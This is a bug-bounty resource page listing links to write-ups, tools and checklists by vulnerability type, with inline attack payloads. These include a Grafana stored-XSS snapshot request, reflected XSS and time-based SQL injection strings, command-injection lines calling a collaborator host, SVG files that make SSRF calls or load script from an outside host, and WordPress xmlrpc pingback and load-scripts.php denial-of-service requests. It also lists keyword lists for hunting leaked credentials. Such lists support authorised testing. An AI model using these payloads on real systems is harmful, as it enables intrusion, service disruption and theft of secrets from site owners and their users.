Write-ups of All types Bugs
Bug Bounty Writeups and exploit‘s resource
2FA
1. 2fa bypass technique https://www.mindmeister.com/1736437018?t=SEeZOmvt01 2. Two-factor authentication security testing and possible bypasses https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35
403 Forbidden Bypass
https://dewangpanchal98.medium.com/403-forbidden-bypass-fc8b5df109b7
AEM applications Vulnerabilities
https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=9
AWS-S3-Bucket
Testing for unauthorized file uploads on misconfigured AWS S3 buckets https://alph4byt3.medium.com/testing-for-unauthorized-file-uploads-on-misconfigured-aws-s3-buckets-c114f7653893 aws pentesting https://infosecwriteups.com/deep-dive-into-aws-penetration-testing-a99192a26898 Bypassing and exploiting Bucket Upload Policies and Signed URLs https://labs.detectify.com/2018/08/02/bypassing-exploiting-bucket-upload-policies-signed-urls/ How To Scan AWS's Entire IP Range to Recon SSL Certificates https://www.daehee.com/scan-aws-ip-ssl-certificates/
Adding email checklist
Adding email checklist https://docs.google.com/presentation/d/18EROY7aLfy6omx3-KTjUnAfOuh3UP5UiAnSc__uuRV4/mobilepresent?slide=id.ge49d443037_0_310
Auto-Recon
Rengine
https://github.com/yogeshojha/rengine#quick-installation
CSV-Injection
Bug in Export to Spreadsheet functionality in web applications
1. Details https://www.contextis.com/en/blog/comma-separated-vulnerabilities 2. Hackerone Report https://hackerone.com/reports/928280
CVES
CVE-2020-11022/CVE-2020-11023 https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html CVE-2020-11110 https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html version : Grafana v6.2.5 authentication : v6.2.5 not required to be authenticated send post request to /api/snapshots with the following json body {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} CVE-2021-24169 WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script> CVE-2021-40875 Improper Access Control in Gurock TestRail versions ≤ 7.2.0.3014 results in sensitive file exposure /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure hardcoded credentials, API keys, or other sensitive data. CVE-2021-26084 Remote Code Execution on Confluence Servers https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
Contact-support-page
1. Target Contact page tips
https://docs.google.com/presentation/d/1wqx9fnr9v451FHdU33XeXBIg3b_pfhF9X0ttkydrGlk/mobilepresent?slide=id.gb07b8690e7_0_156
Create edit remove ORG checklist
Checklist
https://docs.google.com/presentation/d/1E5zjGcnqSe7asDreGPgBS2T-bAJ5siuE0QKvJnX91Cw/mobilepresent?slide=id.ge2f51227b3_0_158
Cross-Site WebSocket Hijack
Cross-Site WebSocket Hijack
https://github.com/DeepakPawar95/cswsh
https://sunilyedla.medium.com/websocket-hijacking-to-steal-session-id-of-victim-users-bca84243830
DNS-misconfiguration
Dns misconfig details https://resources.infosecinstitute.com/topic/dns-hacking/ Misconfigure Zone transfer https://www.cybrary.it/blog/0p3n/find-dns-zone-transfer-misconfiguration/
DOS
1. denial of service with web cache poisoning
https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
2. DOS using
(((((()0)))))
https://hackerone.com/reports/993582?__cf_chl_jschl_tk__=pmd_d4edfa2689d4773535bd4991c5ac1b735467eca6-1628409964-0-gqNtZGzNAeKjcnBszQ0O
Email_Injection
https://pentestbook.six2dez.com/enumeration/web/email-attacks
File-Upload
1. https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/ 2. https://thevillagehacker.medium.com/remote-code-execution-due-to-unrestricted-file-upload-153be0009934 3. https://secgeek.net/bookfresh-vulnerability/ 4. https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a https://portswigger.net/kb/issues/00500980_file-upload-functionality https://labs.detectify.com/2015/05/28/building-an-xss-polyglot-through-swf-and-csp/ https://hackerone.com/reports/191380 https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/mobilepresent?slide=id.ga2ef157b83_0_156
Firebase-Databas-Takeover
Firebase Database Takeover
https://danangtriatmaja.medium.com/firebase-database-takover-b7929bbb62e1
https://medium.com/@fs0c131y/how-i-found-the-database-of-the-donald-daters-app-af88b06e39ad
Get-into-BugBounty
Vickie Li writeup
https://medium.com/swlh/mastering-the-skills-of-bug-bounty-2201eb6a9f4
Graphql
Exploiting graphql
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
HTTP-method-testing
1. Http method testing by owasp
https://wiki.owasp.org/index.php/Test_HTTP_Methods_(OTG-CONFIG-006)
Hunting-on-aspx-application
1. Hunting on ASPX Application For P1's [Unauthenticated SOAP,RCE, Info Disclosure]
https://0u.ma/m/3
ICMP Attacks
https://resources.infosecinstitute.com/topic/icmp-attacks/
JIRA-exploit-resources
JIRA cve exploits
https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
JS-analysis
1. Analysis of Client-Side JavaScript https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288 2. https://infosecwriteups.com/one-token-to-leak-them-all-the-story-of-a-8000-npm-token-79b13af182a3 3. linkfinder tool https://github.com/GerbenJavado/LinkFinder 4. Tool to Find js from a web https://github.com/robre/scripthunter 5. a javascript change monitoring tool https://github.com/robre/jsmon 6. Url teacking for changes https://github.com/ahussam/url-tracker 7.This is a command line tool I use when I want to get notified, on Telegram (on my phone), that something has finished running (on my laptop) https://github.com/ShutdownRepo/telegram-bot-cli 8. Static Analysis of Client-Side JavaScript https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
JWT
1. JWT automated vulnerability scanner
https://hackerone.com/reports/993582?__cf_chl_jschl_tk__=pmd_d4edfa2689d4773535bd4991c5ac1b735467eca6-1628409964-0-gqNtZGzNAeKjcnBszQ0O
Java Deserialization
1. Java Deserialization scanner
https://github.com/joaomatosf/jexboss
Laravel-RCE
https://infosecwriteups.com/rce-on-a-laravel-private-program-2fb16cfb9f5c
Login_page
1. Login page checklist
https://docs.google.com/presentation/d/1lGMRCYJo9d66A3rIVNbTk3thn76uc9Gyp8Gpu9mZHQ8/mobilepresent?slide=id.gac49ca7b44_0_158
MY-Recon
Subdomain enumeration
subfinder -d domain.com -o file1.txt assetfinder domain.com -o file2.txt amass enum -d domain.com | teee -a file3.txt
Nginx
https://github.com/stark0de/nginxpwner
OAuth-Vulnerability
1. OAuth Checklist https://www.binarybrotherhood.io/oauth2_threat_model.html 2. OAuth Misconfiguration in small time-window of attack https://muhammad-aamir.medium.com/oauth-misconfiguration-found-in-small-time-window-of-attack-b585afcb94c6 3. https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1 4. Oauth checklist https://docs.google.com/presentation/d/1eu_b8jqrjr0OeetbrNHWPy9KCh8J1GEjuA4CeiRWokI/mobilepresent?slide=id.ga30804010b_0_0 5. Pre-Access to Victim’s Account via Facebook Signup https://akshanshjaiswal.medium.com/pre-access-to-victims-account-via-facebook-signup-60219e9e381d
Reconnaissance
1. https://infosecwriteups.com/guide-to-basic-recon-bug-bounties-recon-728c5242a115 2. https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af 3. https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html 4.OWASP Top 10: The Ultimate Guide5. Recon nahamsec https://docs.google.com/presentation/d/15bdwuAJKwhVwlcijKOXZFI5ZTJT1PdcMUblJVu6dJyU/mobilepresent?slide=id.gc7305a35cd_0_119 6. https://www.bugbountyhunter.com/mobile/tutorials-and-guides 7. Scope based Recon https://blog.cobalt.io/scope-based-recon-smart-recon-tactics-7e72d590eae5 8. Mind Map https://github.com/imran-parray/Mind-Maps 9. Github Recon https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82 10. Recon methodology by @xcheater https://infosecwriteups.com/recon-methodology-for-bug-hunting-e623120a7ca6 11. https://docs.google.com/presentation/d/18o6fwqZB8wqHFYl2M5SO5KMzct8NKVW7G3edgi0XXJk/mobilepresent?slide=id.ge4fdf9c97a_0_316 12. Pentesterland https://pentester.land/cheatsheets/2019/04/15/recon-resources.html
SQL-Injection
1. SQL checklist https://www.notion.so/SQL-INJECTION-e89cf8a972d24a239821b4449f34f4e0 2. https://sapt.medium.com/sqli-on-a-bugcrowd-private-program-17858b57ec61 ')) or sleep(5)=' ;waitfor delay '0:0:5'-- );waitfor delay '0:0:5'-- ';waitfor delay '0:0:5'-- ";waitfor delay '0:0:5'-- ');waitfor delay '0:0:5'-- ");waitfor delay '0:0:5'-- ));waitfor delay '0:0:5'--
SSO
1. SSO Checklist
https://docs.google.com/presentation/d/1bxBL0HyL8pbDUsa00abfbfEoawmx-XsVIkUjF_V2-_I/mobilepresent?slide=id.gaa585d4e81_0_156
SSRF
1. SSRF bible https://docs.google.com/document/u/0/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/mobilebasic#h.3ndar9ni0n0h 2. Tips and tricks for ssrf https://highon.coffee/blog/ssrf-cheat-sheet/#identifying-potential-locations-for-ssrf 3. SSRF payload in image upload <?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="200px" height="200px" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="https://1y0ry36zsloshorypw4jca32mtsjg8.burpcollaborator.net/" x="0" y="0" height="200px" width="200px"/></svg> 4. Bypass by redirect through own server https://infosecwriteups.com/an-exciting-journey-to-find-ssrf-bypass-cloudflare-and-extract-aws-metadata-fdb8be0b5f79 https://d0nut.medium.com/piercing-the-veal-short-stories-to-read-with-friends-4aa86d606fc5
SSTI
1. portswigger SSTI https://portswigger.net/web-security/server-side-template-injection 2. https://verneet.com/fuzzing-77-till-p1/ 3. https://gauravnarwani.com/injecting-6200-to-1200/ 4. SSTI wordlist for fuzzing https://github.com/err0rr/SSTI/blob/master/Wordlist 5. https://verneet.com/fuzzing-77-till-p1/
Scripting
Oneliner Script
https://github.com/dwisiswant0/awesome-oneliner-bugbounty#pure-bash-linkfinder
Setting-page-Checklist
1. Settings page checklist
https://docs.google.com/presentation/d/11Aa5PkGswQdZo3sLYbB8PAFfgGLocDpRujaGf5v6g70/mobilepresent?slide=id.gae8ab10c68_0_156
Shopping-Application
1. Vulnerabilities in shopping application
https://docs.google.com/presentation/d/1yMLYZbjERTeojwjve7Yh6Pojvljnl0UVAKTY9i-ZaSE/mobilepresent?slide=id.gb240823d22_0_155
Subdomain Enumeration
1. DNS subdomain scanner https://github.com/rbsec/dnscan 2. Subdomain Enumeration https://sidxparab.gitbook.io/subdomain-enumeration-guide/introduction/whats-the-need
Wordlist
1.collection of wordlist https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md 2. Dictionary list https://gist.github.com/mrofisr/5010dcb4321c99329c932aaeb3172a8a 3. Common speak wordlist https://github.com/pentester-io/commonspeak
WriteUps
1. hackerone https://hackerone.com/hacktivity 2. Bugreader https://bugreader.com/reports 3. Hackerone Reports poc videos https://github.com/bminossi/AllVideoPocsFromHackerOne 4. Pentesrer land https://pentester.land/list-of-bug-bounty-writeups.html 5. Sillydaddy https://www.sillydaddy.me/
XSS
1. Browser's XSS Filter Bypass Cheat Sheet https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet 2. Stored XSS using file upload https://medium.com/@vis_hacker/how-i-got-stored-xss-using-file-upload-5c33e19df51e 3. XSS Through Parameter Pollution https://infosecwriteups.com/xss-through-parameter-pollution-9a55da150ab2 4. XSS via HTTP Headers https://brutelogic.com.br/blog/xss-via-http-headers/ 5. Blind XSS in svg file <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="200" height="200" zoomAndPan="disable" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xml:space="preserve"> <!-- Script linked from the outside--> <script xlink:href="https://smaul1.xss.ht" /> <script> //<![CDATA[ alert("Smaul"); ]]> </script> </svg>
email-verification
1. https://infosecwriteups.com/email-verification-bypass-a-strange-case-f38291866126 2. Email bounce https://infosecwriteups.com/an-unexpected-bounty-email-bounce-issues-b9f24a35eb68
identify what something is
Identify anything. pyWhat easily lets you identify emails, IP addresses, and more
https://github.com/bee-san/pywhat
reset-password
https://docs.google.com/presentation/d/1QzBl3k3n2q44ULyfZgr_gPZexj8nF5vD8JrS5AUJRbs/mobilepresent?slide=id.gac68916404_0_19
tools
Subdomain Enum Tools https://github.com/projectdiscovery/subfinder https://github.com/OWASP/Amass https://github.com/hannob/tlshelpers/blob/master/getsubdomain https://github.com/tomnomnom/assetfinder Get Subdomains from IPs https://github.com/SpiderLabs/HostHunter https://github.com/infosec-au/altdns https://github.com/ProjectAnte/dnsgen https://github.com/blechschmidt/massdns Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl. https://github.com/lc/gau Github Recon https://github.com/techgaun/github-dorks https://github.com/michenriksen/gitrob https://github.com/eth0izzle/shhgit https://github.com/anshumanbh/git-all-secrets https://github.com/hisxo/gitGraber Get alerted if a new subdomain appears on the target https://github.com/yassineaboukir/sublert 1. Big bounty tools by m4ll0k https://github.com/m4ll0k/Bug-Bounty-Toolz
web-shell
https://github.com/tennc/webshell/blob/master/README_EN.md
WordPress
1. Create database /wp-admin with 403 status Bypass it using /wp-admin/setup-config.php?step=1 This will allow you to create a database 2. xmlrpc.php This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well. Detection visit site.com/xmlrpc.php Get the error message about POST request only Exploit Intercept the request and change the method GET to POST List all Methods <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall> Check the pingback.ping mentod is there or not Perform DDOS <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOUR SERVER >:<port></string></value> </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string> </value></param></params> </methodCall> Perform SSRF (Internal PORT scan only) <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://<YOUR SERVER >:<port></string></value> </param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string> </value></param></params> </methodCall> 3. WP User Enumeration This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff Detection visit site.com/wp-json/wp/v2/users/ http://target.com/?author=1 http://target.com/?rest_route=/wp/v2/users You will see json data with user info in response 4. Denial of Service via load-scripts.php http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter h1 report 5. Denial of Service via load-styles.php http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic 6. Log files exposed http://target.com/wp-content/debug.log 7. Backup file wp-config exposed .wp-config.php.swp wp-config.inc wp-config.old wp-config.txt wp-config.html wp-config.php.bak wp-config.php.dist wp-config.php.inc wp-config.php.old wp-config.php.save wp-config.php.swp wp-config.php.txt wp-config.php.zip wp-config.php.html wp-config.php~ WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script>
GitHub-Dorks
1. Github Dorks https://docs.google.com/presentation/d/1lqBriLkclVwCi4q_VhJUXa-GYehLsMp054PzN4qrTn8/mobilepresent?slide=id.g9e14b666d8_0_147 2. Automation for found high entropy string in git repo https://github.com/trufflesecurity/truffleHog
SearchEngine
1. Search Engine dorks
https://docs.google.com/presentation/d/1dBXWUFKXa6gWQNCifN939Wf1ZNTIELlRZ4FhcaHvSOE/mobilepresent?slide=id.gce482a8cc4_0_310
TravisCI
1. Automation for fetches repos, builds, and logs for any given organization from TravisCI
https://github.com/lc/secretz
os command injection
|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
|nslookup -q=cname my.burpcollaborator.net.&
Grafana
1. CVE-2020-13379 (Denial of Service) <GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D 2. CVE-2020-11110 (Stored XSS) POST /api/snapshots HTTP/1.1 Host: <GRAFANA URL> Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Referer: {{BaseURL}} content-type: application/json Connection: close {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} 3. CVE-2019-15043 (Grafana Unauthenticated API) POST /api/snapshots HTTP/1.1 Host: <GRAFANA URL> Connection: close Content-Length: 235 Accept: */* Accept-Language: en Content-Type: application/json {"dashboard":{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600} 4. Default Credentials Try to login using admin as username and password 5. Signup Enabled <GRAFANA URL>/signup
Admin access Endpoint
/dev/register/
/stag/register/
/dev/login/
/register/
/internal/
/stag/
Admin access Subdomains
dev
stag
admin
internal
stag-dev
stag-admin
internal-dev
Os command injection
/cgi-bin/parameter=payload
WordPress wordlist
wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml
wp-admin/setup-config.php?step=1
Wordlist for Secret Find secret in js and github
cloudinary://
CONFIG
DB_NAME
DB_USER
DB_PASSWORD
DB_HOST
bucket name
Jenkins
OTP
oauth
authoriztion
password
pwd
ftp
dotfiles
JDBC
key-keys
send_key-keys
send,key-keys
token
user
login-signin
passkey-passkeys
pass
secret
SecretAccessKey
app_AWS_SECRET_ACCESS_KEY AWS_SECRET_ACCESS_KEY
credentials
config
security_credentials
connectionstring
ssh2_auth_password
aws_access_key
aws_secret_key
S3_BUCKET
S3_ACCESS_KEY_ID
S3_SECRET_ACCESS_KEY_ID
S3_ENDPOINT
AWS_ACCESS_KEY_ID
list_aws_accounts
SMTP password
github-wordlist-link
https://github.com/heilla/SecurityTesting/blob/master/wordlists/Collection%20of%20wordlists.md